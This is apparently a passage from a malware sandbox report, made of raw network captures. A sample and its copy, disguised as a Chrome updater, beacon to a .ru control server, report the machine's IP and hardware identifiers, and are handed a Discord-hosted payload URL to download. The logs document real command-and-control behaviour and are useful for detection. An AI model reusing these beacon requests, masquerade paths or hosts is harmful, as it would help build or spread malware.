                                                                                    CF-RAY: 8401c73d7df2241b-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:48 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.2.649813162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:48 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:48 UTC1348INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:48 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c73f9e6681f9-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 21
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:48 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=MKK8WEi_OWHGSlzimNW1t5UeGs.nlJ4bh_6aKkvEm0c-1704353448-1-Aconw5ZfE3phJ3xn5YII7aM/M6c8VoRRsRQ+xccZbSjvSVyCVofFCtWcNVenCEKCErp5FzzKTBqt2ZbjFK8wHhA=; path=/; expires=Thu, 04-Jan-24 08:00:48 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n2REsvgweyzKQgCZ%2BTszjYVRZDP%2B3M%2BdryL3wpez2%2FdjPRPFNVSDI1qiAB8%2FB2nRETQIebAmLdFZr%2FvEDX20uCT30D8s%2FoNSyyw8l7Z7BdvIrQIICFtBlwj7HAKrqOBo8aenng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=44k_bmE1h17C0MhBR.FRKIhxQ1yzyp9tNASqJVqNLMo-1704353448917-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:48 UTC21INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65
                                                                                    Data Ascii: <?xml version='1.0' e
                                                                                    2024-01-04 07:30:48 UTC215INData Raw: 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ncoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.2.649814104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:49 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:49 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1ZNClRSrSHdmxnYn8biG2f3HkFQ6AKiYVIJ1OAAnu8Ktqk8%2BHZ86biL4x1gFA%2FpO4%2BDVR639HqbAeJpi1fEvZuC1gMMR18q2ujU6YLajJ7O%2BPVv%2FStrinVhhPzL0eapQbW%2BxhXu6"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c741cd7928c8-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:49 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.2.649815104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:49 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:49 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nHgUdz4nAMwHci3w3BObu9JTHUDSuecbnMO8gVGLN1W80rzGRf4HEIZVnfGa%2BVwRCikQA5Q2%2F5pexs39%2FEgOVTnmdqHsh2k7aqQuBeG1o%2Bvn1JQOscFZlzpTn55LPZL7V4u0KGpO"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7432e940830-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:49 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.2.649816162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:49 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:49 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:49 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c74608b13b00-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 33
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:49 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=tIamJK0YHAKamF1inBA9eXfdGwQMFq2at2oZ7PqK74M-1704353449-1-ASS3esW0JXjawT0S2fX0FODGvC7hDLK6cZRFVmXWeGl3rYtYxovXM7cPpVkUxKUFlwusASd+hdiCpm9cjkhDjkg=; path=/; expires=Thu, 04-Jan-24 08:00:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xkhu5M%2FlhItB1PCDv53FPjJjdat0n07XP06E35VMXB%2FeOn2dNUWBiOXs7eiyB1ebnBH7u9fg0KFU03VPZbrzFwFKcMRMyTbX8YSi28tnsERO5k26xc%2B%2BWOSwQg7s943lTtvfXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=sr4gtKNVjL0QyryJvkUAIifruV__34NHn1lYe98iY_E-1704353449958-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:49 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:30:49 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.2.649817104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:49 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:50 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lY%2BTtVZayBj6mdcEV1OcEo7hcF%2FOFf48DpgRF7jkPggiBTYd6m0Q6adQDmEqY6E1OhP4rpZ2cIHJjKwOzplYJ8WBRYjZo91CguaxTHoVylZWyWW%2BV4wfl0y6ZijX7tgl0NxwPnUg"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7477f3d2d0e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:50 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    96192.168.2.649818104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:50 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:50 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ksNvu%2B7bg%2FnI0INeT%2BqBFoiCdqJuWa0HvxxmaTQIZX28jtsptXchvItUInKijWLl15R5CAtJeFtZTrxtsKOVHs7rxP1z0pVb%2B2ZYHaSDZmtUAYfgcez8qXsIb7n9I8RkzI7K5Eqy"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c74998546fa7-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:50 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    97192.168.2.649819162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:50 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:50 UTC1333INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:50 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c74bacb407dd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 34
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:50 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=2F3GNbnZRzOCDnBEJ_flDUptjtcy7G1kOupf09P1ZWo-1704353450-1-AXewBf8cNlHfoRo4f1CW41nNIMnyaBkTMJiBAiF0tjvUK6E7Z5zBayGfpChMyvXl26Xyc3fJWfU36qh0wV5iQVA=; path=/; expires=Thu, 04-Jan-24 08:00:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XC70hoZ0srUtfVtUrR%2FfbO2VeXy22HXajrL677lSYq00hWYP6HSgawVHHFqnnBtn8SLg4JRxg71G1Gk5HkBCGdxslFvxLEsq8U7O%2FtFsAIMUFk5VqxzyyK4%2BGZkhijldSghsqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=R4FirR2JOAfQdueETRBubiaRFfVdb.Wz4kMbOrHDoUs-1704353450859-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:50 UTC36INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'
                                                                                    2024-01-04 07:30:50 UTC200INData Raw: 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    98192.168.2.649820104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:50 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:51 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0ShVxcXUCXMVPpLPBK3Hmm%2FXkGfxF%2FvMFUKWTkoOTvtVD9bUPVzeyO2eHG6BOninBmGBrTKnBIEvcBUnhEzmVN7rfEowGMbf99Iwxc7Iq4vvW6XDPrP6%2FZ272eLMMmpsvRkAjgt"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c74de9cf82c3-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:51 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    99192.168.2.649821104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:51 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:51 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eBaVwN6Fye69qOKcs8K%2FWmnnB2M6rKgJcxf8uBuroJVHNmww2nzet86u0SabkkLhEW2FdWEZcd7QbGlR5Np2nRItXtcu7jSjFXh1BOb8iwEs6A7DSEvdGuOBQ1zDui3eEV974XXA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c74f4d713b65-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:51 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    100192.168.2.649823162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:51 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:51 UTC1333INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:51 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7521ce60a89-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 31
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:51 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzI
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=ePwIXFEeXkPABrzeYtE90XduZx0HdXC_uMI0gEfbKCE-1704353451-1-AcA4bFz/2L7Wc7Z3DHDLgIF/e9n5b71BhbfAY2XLBOiPf7VbdxjJZjbNgUuRvsvEE5UDCsGml4XU54/Cd+DSAHA=; path=/; expires=Thu, 04-Jan-24 08:00:51 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BtzEc3O3SXrB3Zpu12t5r3TeBLz%2FlC2QM3kjJsJXC62mjZO4UmokAnUUnobANrf6usHX47n%2FPAb8neOgsncsOYfOanfS8ZpkVcJbfS4SPdNMltb8XX1u6KvPk1QdBf455VMfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=UGQ0VKDqfFyY3qsz7sOYP24xQo0neV2npRXIBvTR1Os-1704353451876-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:51 UTC36INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'
                                                                                    2024-01-04 07:30:51 UTC200INData Raw: 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    101192.168.2.649824104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:51 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:52 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tu%2B4Yg7qk%2BrBTTZ7nSUR4wqOF70SU4vm3Y1%2FqMOQEP4Udtgxy2DuimAK61aORp6xh5rv4bvtrmqvlCDhUGE2DYs1idkz8cilcUNLiw8lTcdb73l4pjLi%2FWd5R2Anxja%2BgIg34sYF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7539e5f57be-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:52 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
